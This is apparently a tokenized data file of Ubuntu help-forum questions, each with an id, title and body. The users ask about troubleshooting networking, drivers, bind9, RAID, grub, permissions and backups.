ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 0 ; 32m\ ] ➤\ [ \033 [ 01 ; 34m\ ] ' fi # alias to turn short terminal prompt on or off alias shortp='echo `` 1 '' > .bashrcpl & source ~/.bashrc & > /dev/null' alias longp='echo `` 0 '' > .bashrcpl & source ~/.bashrc & > /dev/null'
422912	overheating when using file roller	every time i try to compress a folder of about 1 gb with file roller i have to stop after a few seconds because my laptop overheats . i 've checked the temperature in psensor and it goes over 85 ยบc ( cpu usage is near 100 % ) . i 've installed tlp , but it seems to do nothing . i am running ubuntu 13.10 32-bit on a dell latitude d630 intel core2 duo cpu t7500 @ 2.20ghz ร 2 . how can i solve this problem ? thank you for your help .
422915	ubuntu 12.04 : bind9 does not want to start ( permission denied )	i am trying to start bind9 with no success . the error seems to be related to permission but i just can not find the cause . root @ server : ~ # /etc/init.d/bind9 start feb 18 20:42:24 server named [ 2974 ] : zone 0.in-addr.arpa/in : loaded serial 1 feb 18 20:42:24 server named [ 2974 ] : zone 127.in-addr.arpa/in : loaded serial 1 feb 18 20:42:24 server named [ 2974 ] : zone 57.168.192.in-addr.arpa/in : loading from master file /etc/bind/zones/rev.57.168.192.in-addr.arpa failed : permission denied feb 18 20:42:24 server named [ 2974 ] : zone 57.168.192.in-addr.arpa/in : not loaded due to errors . here is the configuration file : root @ server : /etc/bind # cat named.conf include `` /etc/bind/named.conf.options '' ; include `` /etc/bind/named.conf.local '' ; include `` /etc/bind/named.conf.default-zones '' root @ server : /etc/bind # cat named.conf.options options { directory `` /var/cache/bind '' ; forwarders { 8.8.8.8 ; 4.4.4.4 ; } ; auth-nxdomain no ; # conform to rfc1035 listen-on-v6 { any ; } ; } ; root @ server : /etc/bind # cat named.conf.local zone `` example.com '' { type master ; file `` /etc/bind/zones/example.com.db '' ; } ; zone `` 57.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/zones/rev.57.168.192.in-addr.arpa '' ; } ; root @ server : /etc/bind # cat named.conf.default-zones // prime the server with knowledge of the root servers zone `` . '' { type hint ; file `` /etc/bind/db.root '' ; } ; // be authoritative for the localhost forward and reverse zones , and for // broadcast zones as per rfc 1912 zone `` localhost '' { type master ; file `` /etc/bind/db.local '' ; } ; zone `` 127.in-addr.arpa '' { type master ; file `` /etc/bind/db.127 '' ; } ; zone `` 0.in-addr.arpa '' { type master ; file `` /etc/bind/db.0 '' ; } ; zone `` 255.in-addr.arpa '' { type master ; file `` /etc/bind/db.255 '' ; } ; file permissions seems to be fine root @ server : /etc/bind/zones # ls -all -rw-r -- r -- 1 root bind 675 feb 16 22:28 example.com.db -rw-r -- r -- 1 root bind 599 feb 16 22:15 rev.57.168.192.in-addr.arpa everything seems to be o.k . when i start it manually root @ server : ~ # named -g 18-feb-2014 21:21:20.913 starting bind 9.8.1-p1 -g 18-feb-2014 21:21:21.035 zone 0.in-addr.arpa/in : loaded serial 1 18-feb-2014 21:21:21.035 zone 127.in-addr.arpa/in : loaded serial 1 18-feb-2014 21:21:21.053 zone 57.168.192.in-addr.arpa/in : loaded serial 2 18-feb-2014 21:21:21.054 zone 255.in-addr.arpa/in : loaded serial 1 18-feb-2014 21:21:21.071 zone example.com/in : loaded serial 1 18-feb-2014 21:21:21.072 zone localhost/in : loaded serial 2 18-feb-2014 21:21:21.072 managed-keys-zone ./in : loaded serial 0 18-feb-2014 21:21:21.072 running any help would be appreciated thanks stephane
422919	ca n't install android tools ( ubuntu 12.04 )	when i input the command line sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot the terminal gives me the following response : '' reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phablet-tools : depends : click but it is not installable recommends : ubuntu-dev-tools but it is not going to be installed e : unable to correct problems , you have held broken packages . '' how can i fix this ?
422920	opengl help on lenovo think pad t61	i received a lenovo think pad t61 the other day and installed xubuntu 12.04 onto it . well last night i was able to run minecraft after installing bumblebee . well i tried to see if gary 's mod would work and it was n't able to run so i made some changes to drivers and now neither minecraft or gary 's mod work . so when i tried to replicate what i did with bumblebee minecraft will not run still . i 've come to you all because i am somewhat new to xubuntu and am in need of help . can you help a brother out ? thank you in advance .
422926	no wireless and wired on ubuntu 12.04 in acer aspire e1-570	i 'm running ubuntu 12.04 . after running an update and restarting , on the top right it says no network devices available . linux ca n't find the network card . it was working fine earlier.. the command dmesg | grep eth [ 0.793336 ] i2c-core : driver [ aat2870 ] using legacy suspend method [ 0.793338 ] i2c-core : driver [ aat2870 ] using legacy suspend method it does not list any eth0/eth1/eth2 etc . however , lspci outputs 02:00.0 ethernet controller : broadcom corporation netxtreme bcm57786 gigabit ethernet pcie ( rev 01 ) the command lshw -c network outputs : *-network unclaimed description : ethernet controller product : netxtreme bcm57786 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0410000-c041ffff memory : c0420000-c042ffff memory : c0430000-c043ffff *-network unclaimed description : network controller product : qca9565 / ar9565 wirelesss network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c057ffff memory : afc00000-afc0ffff is there a problem with the drivers or something else ? any help would be really appreciated .
422927	create launcher wo n't work	i 'm trying to create desktop shortcuts , and i 've been told to use gnome-desktop-item-edit -- create-new ~/desktop this creates the launcher on the desktop , but the application wo n't launch . what should i do ?
422928	how to reinstall network manager without internet access ?	unfortunately , i uninstalled network-manager-gnome using sudo apt-get remove -- purge network-manager . i was trying to reinstall it from but without internet connection i can not do so . what is the solution for this ?
422931	kvm and port security	in my test environment i get everything working perfectly the way i want it . running cloudmin kvm instances over a bridged adapter . then when it comes time to install at the data center i hit a brick wall . they have port security turned on which only allows one mac address over the network port . since i only have 2 interfaces i need to run several kvm instances ( 10 or more ) with each assigned their own static public ip . i do n't have a range of ips either . i was assigned specific ones . is there a way around this where i can assign each kvm instance it 's own ip but only use one mac address ? keep in mind this needs to be kvm via cloudmin . thanks
422936	intel centrino wimax 6250 - constant slow and dropped signal ( ubuntu 13.10 )	i 've been surfing the forums for a while now , and i have hit a brick wall . i have a sony viao computer with the above mentioned wireless adapter . it constantly slows to speeds of under 20 kb/sec , goes back and forth , or sometimes ( when i 'm lucky ) hits speeds exceeding 500 kb/s , which should be constant if i 'm not correct : s i downloaded the latest firmware , and unpacked the archive to /lib/firmware as every attempt to find the drivers sends me to this site , http : //wireless.kernel.org/en/users/drivers/iwlwifi # download , but i can only find firmware here . what is the next step that i 'm missing ? is this even a driver issue , or is there something else wrong . i 'm lost in ubuntu and i 'm a noob . help ! ps > i just noticed another detail . in the readme file for the firmware it reads : '' 2 . installation the iwlagn driver will look for the file iwlwifi-6050-5.ucode using the kernel 's firmware_class infrastructure . more information can be found under documentation/firmware_class in kernel source . in order to function correctly , you need to have this support enabled in your kernel . when you configure the kernel , you can find this option in the following location : device drivers - > generic driver options - > userspace firmware loading support you can determine if your kernel currently has firmware loader support by looking for the config_fw_loader definition on your kernel's .config . '' i just realized that i have no idea what this means , how to find this config file or if it is relevant to my problem . help ! pss > when i try to run the intel auto detect/install function on firefox instead , here : http : //www.intel.com/p/en_us/support/detect/wireless , it comes back with an error saying , the intel driver update utility installation failed . possible web browser compatiblity , firewall , or installation issue detected . select ok to troubleshoot issue
422940	pstree shows lots of process	this is a dump of pstree . i am running firefox ( one tab ) and gnome-terminal ( 1 tab ) . i count 4 gnome-terminal processes and 34 firefox processes . is it normal ? actually every application running seems to be duplicated . thanks init─┬─networkmanager─┬─dhclient │ ├─dnsmasq │ └─3* [ { networkmanager } ] ├─accounts-daemon───2* [ { accounts-daemon } ] ├─acpid ├─at-spi-bus-laun─┬─dbus-daemon │ └─3* [ { at-spi-bus-laun } ] ├─at-spi2-registr─── { at-spi2-registr } ├─atd ├─avahi-daemon───avahi-daemon ├─bamfdaemon───3* [ { bamfdaemon } ] ├─bluetoothd ├─colord─── { colord } ├─console-kit-dae───64* [ { console-kit-dae } ] ├─cron ├─cups-browsed ├─cupsd───dbus ├─2* [ dbus-daemon ] ├─dbus-launch ├─dconf-service───2* [ { dconf-service } ] ├─evolution-calen───4* [ { evolution-calen } ] ├─evolution-sourc───2* [ { evolution-sourc } ] ├─firefox───34* [ { firefox } ] ├─gconfd-2 ├─gdm─┬─gdm-simple-slav─┬─xorg───2* [ { xorg } ] │ │ ├─gdm-session-wor─┬─gnome-session─┬─compiz─┬─sh───+ │ │ │ │ │ └─3* [ { c+ │ │ │ │ ├─deja-dup-monit+ │ │ │ │ ├─evolution-alar+ │ │ │ │ ├─gnome-fallback+ │ │ │ │ ├─gnome-screensa+ │ │ │ │ ├─gnome-settings+ │ │ │ │ ├─gnome-user-sha+ │ │ │ │ ├─polkit-gnome-a+ │ │ │ │ ├─ssh-agent │ │ │ │ ├─telepathy-indi+ │ │ │ │ ├─tracker-miner-+ │ │ │ │ ├─tracker-store─+++ │ │ │ │ ├─update-notifie+ │ │ │ │ ├─zeitgeist-data+ │ │ │ │ └─3* [ { gnome-sess+ │ │ │ └─2* [ { gdm-session-wor } ] │ │ └─2* [ { gdm-simple-slav } ] │ └─2* [ { gdm } ] ├─5* [ getty ] ├─gnome-keyring-d───7* [ { gnome-keyring-d } ] ├─gnome-terminal─┬─gnome-pty-helpe │ ├─tcsh───pstree │ └─3* [ { gnome-terminal } ] ├─goa-daemon───2* [ { goa-daemon } ] ├─gvfs-afc-volume───2* [ { gvfs-afc-volume } ] ├─gvfs-gphoto2-vo─── { gvfs-gphoto2-vo } ├─gvfs-mtp-volume─── { gvfs-mtp-volume } ├─gvfs-udisks2-vo─── { gvfs-udisks2-vo } ├─gvfsd─── { gvfsd } ├─gvfsd-burn─── { gvfsd-burn } ├─gvfsd-fuse───4* [ { gvfsd-fuse } ] ├─gvfsd-trash───2* [ { gvfsd-trash } ] ├─hud-service───3* [ { hud-service } ] ├─indicator-appli─── { indicator-appli } ├─indicator-bluet───2* [ { indicator-bluet } ] ├─indicator-datet───3* [ { indicator-datet } ] ├─indicator-messa───2* [ { indicator-messa } ] ├─indicator-print───2* [ { indicator-print } ] ├─indicator-sessi───2* [ { indicator-sessi } ] ├─indicator-sound───2* [ { indicator-sound } ] ├─indicator-sync-─── { indicator-sync- } ├─irqbalance ├─login───tcsh ├─mission-control───2* [ { mission-control } ] ├─modem-manager ├─polkitd─── { polkitd } ├─pulseaudio─┬─gconf-helper │ └─2* [ { pulseaudio } ] ├─rsyslogd───3* [ { rsyslogd } ] ├─rtkit-daemon───2* [ { rtkit-daemon } ] ├─ubuntuone-syncd───3* [ { ubuntuone-syncd } ] ├─udevd───2* [ udevd ] ├─udisksd───4* [ { udisksd } ] ├─unity-applicati───2* [ { unity-applicati } ] ├─unity-files-dae───2* [ { unity-files-dae } ] ├─unity-lens-frie───2* [ { unity-lens-frie } ] ├─unity-lens-phot───3* [ { unity-lens-phot } ] ├─unity-music-dae─── { unity-music-dae } ├─unity-musicstor───2* [ { unity-musicstor } ] ├─unity-panel-ser───3* [ { unity-panel-ser } ] ├─unity-scope-gdr───3* [ { unity-scope-gdr } ] ├─unity-scope-vid───2* [ { unity-scope-vid } ] ├─unity-video-len─── { unity-video-len } ├─unity-webapps-s───2* [ { unity-webapps-s } ] ├─upowerd───2* [ { upowerd } ] ├─upstart-file-br ├─upstart-socket- ├─upstart-udev-br ├─vsftpd ├─whoopsie───2* [ { whoopsie } ] ├─wpa_supplicant ├─zeitgeist-daemo─── { zeitgeist-daemo } └─zeitgeist-fts─┬─cat └─ { zeitgeist-fts }
422941	no linux section in sdk add-ons	so im trying to get adb up and running . i installed android sdk manager and when i open tools so i can manage the add-on sites there is not a linux section so for me to follow . i need to install nook sdk add-on . is nook sdk located in a different directory ?
422943	what partitions to create on external hard disk ?	it wo n't boot and gives me a ntldr error when i select it via my bios . i 've tried using a usb stick , but after a couple of writes it 's no longer recognized . i currently have an hp pavilion lappy with windows . i tried doing what was in this video . http : //www.youtube.com/watch ? v=kdm2lqfohv4 does it matter if the unpartioned/kept space is on the left or right ? maybe i was supposed to set something as logical instead of primary ? i could n't find an exact question like this , and have found out that grub does n't support hdds but do n't know if that has changed over time . thank you .
422944	stop a service from starting when it is disabled in the rc.d	i am running a minimal ubuntu 13.04 on a beaglebone . i try to disable udhcpd permanently , but i do not want to remove it . i want to be able to enable it when/if i need it . i have removed it from the rc.d by executing sudo update-rc.d -f udhcpd remove and i even cross verified that by installing and running sysv-rc-conf . after doing that , if i reboot , everything seems to work properly . i execute ps -e | grep udhcpd to verify that udhcpd has n't started and indeed i get nothing . however , when i shutdown the system and turn it back on , udhcpd is back on ! any ideas on what and why is going on and how to solve this ?
422946	is it possible upgrade ubuntu from 13.04 to 13.10 without losing development configurations ?	currently canonical is no longer supporting ubuntu 13.04 , so i wonder if ( and i 'm asking only for my currently work 's project that are a pita to reinstall , do n't ask why ) upgrading will lose my config . previous version i know that i every installation , but i want to know if for there is anyway that i could upgrade without this reinstallation of my development tools . thanks
422950	root folder access via gui	i 'm new to linux and the terminal . as i learn how to use the terminal to navigate through directories , i like to use the gui file explorer to mirror my terminal navigation . the icons and file extension info in the gui file explorer help me figure out what everything is . however , i ca n't access the root folder via the gui , i can only access it via the terminal . is there a way to enable access to the root folder outside of the terminal ?
422955	enable wireless in ubuntu 12.04 / reset network configuration	edit : i tired using my laptop as hotspot after that these problems appeared . ifconfig output : wlan0 link encap : ethernet hwaddr xx : xx : xx : xx inet addr:10.10.0.1 bcast:10.10.0.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:33 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:7298 ( 7.2 kb ) i saw this when i ran .. ratan @ lenovo : ~ $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no but my wireless is still disabled , i do n't have any keyboard shortcut to disable/enable it wireless . it even tried these .. but no luck sudo /etc/init.d/networking restart sudo service network-manager start dmesg | grep -e ath -e wlan output : [ 314.214978 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 485.553814 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 485.633642 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 626.002830 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 629.806884 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 642.784001 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1265.207904 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1351.296086 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1360.155428 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1362.570365 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1362.591639 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 1366.739571 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1520.306470 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready ps : when my pc boots it looks for network configuration but it fails after searching for 60 secs .
422963	asus x202e - skype & audio issues	my little asus x202e has worked beautifully as a dual boot ( ubuntu 13.04 - 13.10 & win8 ) machine . however , after nearly a year of owning it , i can not seem to get some of the audio issues with it settled ! primarily , the difficulty lies with skype , which is essential for international communication . output audio is no problem . input is an issue ! the skype/microphone will pick up clapping or shouts ( results in spiked garbled crackling ) , but nothing else . incidentally , the problem is the same recording in audacity . i have tried what was suggested here : http : //ubuntuforums.org/showthread.php ? t=2121812 '' sound settings and set the optimal level and disabled the auto level option in skype '' what else can i try ?
422965	auto switch of graphics card	is there any tool which will choose which card to use when a program is running . i have two card one is intel on board and other one is a nvidia 630m . i do n't want to optirun every time i start a program . so do we have some tool that will choose the graphics card according to the programs requirement .
422966	changed all files and folder permissions to 755 and ca n't log in	i accidentally ran the command sudo chmod -r 755 while trying to run lamp . i was getting a 403 permission error so i tried to fix the permissions . i 'm running ubuntu 13.10 and now i ca n't log in even in recovery mode . my password does n't work and when i change it i get an authentication token error . i fixed that by mounting the drive as read and write , but then i still could n't log in . is my only option to reinstall from my disk ? thanks !
422969	new build ubuntu wo n't install	just built a budget rig to install ubuntu on , lts 64bit version . using an lga 1155 celeron g1630 on an ecs mobo and 4g ddr3 ram on a 480w corsair psu , 1 tb hdd . i went on my wife 's pc to download the ubuntu version and stored it in a brand new thumb `` flash '' drive . enter the bios and i ca n't seem to boot ubuntu up for the life of me ! do i change the boot settings from window s 7 or others to manual ? because that did n't work ! do i change the boot priority to flash drive first because that did n't work . is there a different way to go about ubuntu installation on a new rig ?
422975	e : package 'python-software-properties ' has no installation candidate	sudo apt-get install python-software-properties reading package lists ... done building dependency tree ... done package python-software-properties is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : software-properties-common e : package 'python-software-properties ' has no installation candidate how can i fix this error ?
422978	backup of apps and gui settings	well , i got ( i think ) a pretty basic question . i 'm new in ubuntu , and i 'm wondering how do i backup all i 've installed and my gui settings and tweaks . i 'm not pretty much interested in backing up info ( as ubuntu official backup seems to be oriented to ) , since i work everything in dropbox or google drive , but better in all the drivers , programs ( or packages as it is called in ubuntu ... btw , it 's difficult to get used to terms , programs in windows , apps in macos , packages in ubuntu ... well ) so , long question made short : i want to backup my nvidia driver , appearence and mouse and display settings , and overall all i 've installed in my machine such as skype , chrome , synapse , etc etc etc . any help or guidance is welcome ! : )
422979	how to fix `` out of range '' problem	i have a dell dimension 4550 with ubuntu 12.04 installed along with windows xp . before the grub screen appears , i get the out of range message on my monitor . after a few seconds a dialog box appears , i have to use the ctrl+alt+ ( - ) to read it due to my monitor resolution not being detected . it says something along the lines of running in low graphics mode . after a few options , i select trouble shoot and nothing happens . so i hit cancel and it returns to out of range . therefore i can not see or access the grub to load windows . if i switched monitors would that fix my problem ? i currently have a benq 700x584 i think and plan on moving to a 1024x768 moniter .
422980	issues after installing cinnamon on ubuntu 13.10	i am using ubuntu 13.10 and tries to install cinnamon on this . but after the installation i am facing various issues . mouse is not working on login screen . menu is showing as deselected ( dim ) for most of the applications including google chrome and sublime . i am not able to select the menu items like open etc . sometimes , when i turn on the laptop , it is going to low graphics mode . if i connect to another monitor , it is not detecting it automatically . before it was doing it . if i take settings or something , it is showing broken graphics . i am attaching the screenshots for the details screen . by the way i have removed all cinnamon things from my system . but it is not fixing the issue . thanks for any help .
422981	how to do port forwarding over a public network ?	i am stuck in one complicated task , i am having following structure , _____________________________ | [ pc1 ] -- ( in same net ) -- [ pc2 ] | -- -- ( over internet or public net ) -- - [ pc3 : port1 ] -- -- ( over internet or public net ) -- - [ pc4 : port2 ] -- -- ( over internet or public net ) -- - [ pc5 : port3 ] . . .n so , first thing all pc are ubuntu machines now , i want to do that have to implement port forwarding on pc2 which help me to connect pc3 , pc4 , pc5 using different port but when i will use only ip without port it should connect to pc2 only , pc1 and pc2 are in same network but pc3 , pc4 , pc5 are over public network , how can i do that ? thanks in advance
422983	svn+ssh is n't work by using user svn	i had installed subversion and managed it allow only user who have key in authorized_keys of svn . there is a weird thing when i 'm working around with ssv+ssh . the svn is working when i use below ; svn info svn+ssh : //server1/repos/test but it shown no repositories when i use this ; svn info svn+ssh : //svn @ server1/repos/test my questions ; what is different between these above command ? and how to make the second command work with the same result of the first one ?
422984	install windows 7 onto another hdd	this is my current hdd set up sd0 -- ext4 storage drive sd1 -- ext4 storage drive sd2 -- ext4 boot drive sd3 -- ntsf drive that i want to boot windows 7 whenever i put in my cd and decide to install onto sd3 it says unable to create a new system partition . even when it lets me delete , create , and format the drive . here is all of the drives :
422985	firefox shortcut ( ctrl+tab ) wont work on flash video	while i am using firefox and have multiple tabs , when i navigate through the tabs and some tab happens to have a flash player video ( etc facebook video , youtube video ) the shortcut ctrl+tab does n't work there shortcut gets on the video and a yellow box appear , moving around and its annoying sometimes because i want to navigate through the tabs and it start on the video so i was wondering if there is any solution to this ? using firefox on ubuntu 13.10
422993	acer c7 chromebook running 13.10 slow performance graphics ?	i see others are having simiar issues but i have n't found a fix . instead of the intel fdriver , ubuntu showing gallium driver . honestly , the performance is sluggish , i was n't even sure it was video issues to begin with but apparently so . can anyone provide a sure fire fix ? 12.04 ran perfectly . 13.10 is so much betterhank you everyone ! = (
422997	ubuntu 12.04lts mobile broadband loose connecton after every few minutes	ubuntu 12.04lts mobile broadband loose connection after every few minutes . i am using samsung mobile it is gt-s3653 .
422999	github ask for username & password after configure ssh ?	i have created ssh keygen and just add the public key to my github account . when i am pushing my local saved state to github repo.it ask for username & password again . any input would be greatly appreciated .
423000	how to run vbscript on ubuntu 12.04 ?	i ve just installed ubuntu 12.04 on my laptop . i want to use vbscript for cding on my website , because we have the vbscript for our study course [ class 11 multimedia cbse ] . but i can not find a browser to run it . i really dont have any idea about any alternative . also i dont know about any emulator like we have for android on windows . please help , i have to practise and we have practicals in a week . also my laptop is quite old so windows does not work properly .
423001	crash sts ubuntu 13.10	i use spring tool suite for develop a java program , i have installed jdk1.6.0_45 . i have ubuntu 13.10 but when the project run the sts crashed . # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0xb2dd0a43 , pid=11386 , tid=3076249280 # # jre version : 6.0_45-b06 # java vm : java hotspot ( tm ) client vm ( 20.45-b01 mixed mode , sharing linux-x86 ) # problematic frame : # c [ libgtk-x11-2.0.so.0+0x262a43 ] __float128+0x23 # # if you would like to submit a bug report , please visit : # http : //java.sun.com/webapps/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . any idea what the problem is ?
423002	ubuntu one files	ok so i had an `` album '' of photos i had forgotten was even on ubuntu one , as i had n't accessed my ubuntu one account in years . these were photos from when i was much younger from a computer that is long gone and the hdd wiped and disposed of . i wanted them gone , so i `` desynced '' the folder from my account . now the files are gone , but where ? i was not given an option to delete , just desync the folder . where did the files go ? were they deleted ? are they floating around on the `` cloud '' somewhere still ? if so , how can i have them deleted since now i ca n't see the album ? any help is great , thanks in advance .
423007	delete ubuntu & allocate space back to windows ?	so after fighting with ubuntu , microsoft windows and uefi for far too long , my patience has finally run out ... i have been unable to get everything working properly , and thus the kids exclusively use windows 8.1 on this computer ... so i want want to remove ubuntu entirely . but short of a ( windows 8.1 ) clean install , what is the easiest way to : * completely remove ubuntu ; * allocate the space back to windows 8.1 and ; * undo any changes to my uefi/restore my uefi back to its factory state ( if required or recommended ) ? thanks !
423017	external usb drive read-only can not change to read & write	recently i bought a foxconn at-5250 barebones computer that i loaded with ubuntu 12.04 lts with the purpose of using it as a plex media server computer . after i got plex up and running it worked great to stream the few movies i loaded onto the 60 gb ssd in the foxconn to my phone and tablet . my next step was to add an external drive so i can load it up with tons of movies and tv shows . i used a 1 tb lacie hitachi hds721010cla332 hard drive originally formatted on my macbook pro using mac os extended ( journaled ) . i plugged it into the foxconn and it mounted but i was unable to transfer the video files to the external drive and received the message : error while copying to `` media '' the destination is read-only . i used gparted and diskutility to reformat , erase , create new partitions , etc , so many times to see if anything would change i have gone slightly crazy going through all the advice i have found through google and this site . i checked the permissions on the drive and the `` media '' drive is set to drwxrwxrwx , which should give me full permission to add or delete files . i still get the error message when i try . when i go into the permissions tab under `` media '' properties it is clear that i am the owner . folder access : create and delete files . file access : it wo n't let me change it to read and write . someone please help this crazy n00b . disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 1 1953525167 976762583+ ee gpt
423021	android eclipse error	when i am creating a new android project in eclipse a file named r.java is supposed to be created automatically which is not happening . my ubuntu is 12.04 lts 64 bit my eclipse version is juno for jee sr1 x86_64
423023	all data gone from healthy raid5 array	i have an issue with my raid 5 array that is puzzling me . the pc crashed yesterday and after a reboot my raid 5 array was empty . cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid10 ] md0 : active raid5 sdi1 [ 3 ] sdd1 [ 4 ] sda1 [ 0 ] sdc1 [ 2 ] sdb1 [ 1 ] 5860545536 blocks super 1.2 level 5 , 256k chunk , algorithm 2 [ 5/5 ] [ uuuuu ] sudo mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : thu jul 26 17:59:04 2012 raid level : raid5 array size : 5860545536 ( 5589.05 gib 6001.20 gb ) used dev size : 1465136384 ( 1397.26 gib 1500.30 gb ) raid devices : 5 total devices : 5 persistence : superblock is persistent update time : wed feb 19 07:40:09 2014 state : clean active devices : 5 working devices : 5 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 256k name : kb01:0 ( local to host kb01 ) uuid : 4f992d9b:0328b7bb:38d77cc4:80172ca6 events : 371 number major minor raiddevice state 0 8 1 0 active sync /dev/sda1 1 8 17 1 active sync /dev/sdb1 2 8 33 2 active sync /dev/sdc1 3 8 129 3 active sync /dev/sdi1 4 8 49 4 active sync /dev/sdd1 df /dev/md0 5858458624 44744 5858413880 1 % /mnt/raid any help would be appreciated . i am using kubuntu 13.10 added by edit ; the xfs file system checked out ok using sudo xfs_check /dev/md0 the top level of the file structure is still visible ls /mnt/raid library library1 library2 lost+found i had just finished restoring to another drive mounted on library1 which still contains the data on an ext4 file system . still totally puzzled where the data went .
423027	13.10 : gnome-tweak-tool segfaults	i can not start the gnome tweak tool ; it quickly pops up its window , then dies . from a terminal this is what i get : $ gnome-tweak-tool warning : shell not installed or running info : gsettings missing key org.gnome.nautilus.desktop ( key computer-icon-visible ) warning : error detecting shell traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 199 , in __init__ raise exception ( `` shell not running or dbus service not available '' ) exception : shell not running or dbus service not available warning : shell not running none info : gsettings missing key org.gnome.mutter ( key workspaces-only-on-primary ) segmentation fault ( core dumped ) $ and when i type 'gnome-shell ' maybe with `` -- replace '' , i get $ gnome-shell org.gnome.shell already exists on bus and -- replace not specified $ gnome-shell -- replace org.gnome.shell already exists on bus and -- replace not specified
423032	how to fix sound control problems ?	i 'm having some issues with sound control . i 'm running ububtu 13.10 on hp pavilion g6 . for a while sound worked perfectly , but since skype started barring , i got too lots of sound issues . the problem that i 'm facing is that the whole system got itself a default volume intensity which i am not able to control anymore neither from buttons and system settings . i know this question was similarly asked but , no one got the answer to get it fixed . thanks !
423033	how to prevent evince from automatically opening pdf files ?	i am not sure what is wrong with my computer but it automatically opens pdf files using evince whenever i download them from chrome . how could i prevent that ?
423036	grub not responding to keyboard	i installed ubuntu 12.4lts on dual boot with windows xp on my 7 year old desktop pc 2 months ago . everything worked perfectly in both ubuntu and xp until last week when i removed libreoffice from ubuntu and installed openoffice 4.0.1 . ( removal/installation done from terminal as per ubuntu online instructions ) . at the grub menu window , the keyboard is now inoperative , so the system times out and boots ubuntu ( which still works perfectly ) but i can not boot xp . the keyboard ( usb ) works perfectly at the bios stage of startup , does not work during grub , but works again from the ubuntu login onwards . i have looked through the q & as for a solution , the nearest refers to bios keyboard setup , but as my keyboard works in bios i do n't think this is the cause . i am not sure where the problem might be . i have looked at grub.cfg , and whilst a newcomer to linux , can not see anything obviously corrupt , although i can not identify which method/module/function call ( if any ) reads the keyboard . i was considering reloading grub , but if the problem is elsewhere this wo n't solve it , and might make matters worse . any advice would be much appreciated .
423038	how to increase the size of my wubi installation ?	i am new to linux . i have windows installed in my c : drive ( 150 gb ) and i have installed wubi ubuntu on my d : drive ( 100 gb ) . the problem is , while using ubuntu , when i try to install some applications it says that i have too little space to install . i do n't know what the problem is , exactly . when i look from windows , in the d : drive where ubuntu is installed , i see 80.7 gb free of 100 gb . why is there so little disk space available within ubuntu ?
423040	what are the risks of running nautilus as root ?	whenever i try to access files outside my home directory i get a permission error . people keep recommending running nautilus as root by running the following commands in a terminal : sudo -i nautilus gksu nautilus what are the risks of doing so ?
423043	connection on interesting ports ( 25 , 110 etc ) is not refused . who/what accepted it ?	i am running a vps with ubuntu 12.04 . the only payload is reachable for me via ssh at port 2244 , all fine . running a scan from outside ( angryip ) , i see that quite some ports are responsive ( 25,110,119,143,465,563,587,993,995 ) . if i putty to theese ports , i get , indeed , no `` connection refused '' ; instead , i get `` connection reset by peer '' after a while . executing # netstat -tulp # lsof -i # nmap -st -v 127.0.0.1 show nothing but sshd listening on port 2244. iptables is empty . who or what responses to putty and angryip ? why do n't i get `` connection refused '' immediately like on `` truly unused '' ports , e.g . 24 ?
423044	check when folder was last synchronized with rsync	i 'm using a cron job to backup a folder to another computer . i 'm not sure whether or not it succeeded and /var/log/rsync.log is only showing errors , all of which occured before the scheduled backup . there is a record of the backup job being run in /var/log/syslog . is there a way of checking when the folder was last synced or is another way of telling whether the sync succeeded ?
